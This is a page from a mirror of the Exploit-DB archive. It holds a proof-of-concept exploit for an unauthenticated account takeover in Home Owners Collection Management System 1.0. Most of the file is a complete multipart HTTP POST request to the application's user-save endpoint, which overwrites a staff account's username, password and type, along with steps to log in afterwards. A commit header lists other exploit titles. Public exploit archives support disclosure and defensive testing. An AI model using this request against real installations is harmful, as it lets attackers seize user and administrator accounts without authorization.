bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50730.txt
Offensive Security a6102b7922 DB: 2022-02-11 
8 changes to exploits/shellcodes

Cain & Abel 4.9.56 - Unquoted Service Path
Hospital Management Startup 1.0 - 'Multiple' SQLi
Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated)
Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection
WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated)
WordPress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS)
WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)
2022-02-11 05:02:01 +00:00

65 lines
No EOL
2.2 KiB
Text
Raw Blame History

# Exploit Title: Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated)
# Date: 9/02/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Linux
Home Owners Collection Management System is vulnerable to unauthenticated account takeover.
An attacker can takeover any registered 'Staff' user account by just sending below POST request
By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters
#Steps to Reproduce
1. Send the below POST request by changing "id", "firstname", "lastname" , "username" , "password" ,"type" parameters.
2. Go to http://localhost/hocms/admin/ and Log in to the user account by changed username and password
==============================================
POST /hocms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------8012296389370411172619882391
Content-Length: 899
Origin: http://localhost
Connection: close
Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="id"
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="firstname"
hi
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="lastname"
test
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="username"
saud
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="password"
saud
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="type"
1
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
-----------------------------8012296389370411172619882391--
Reference in a new issue View git blame Copy permalink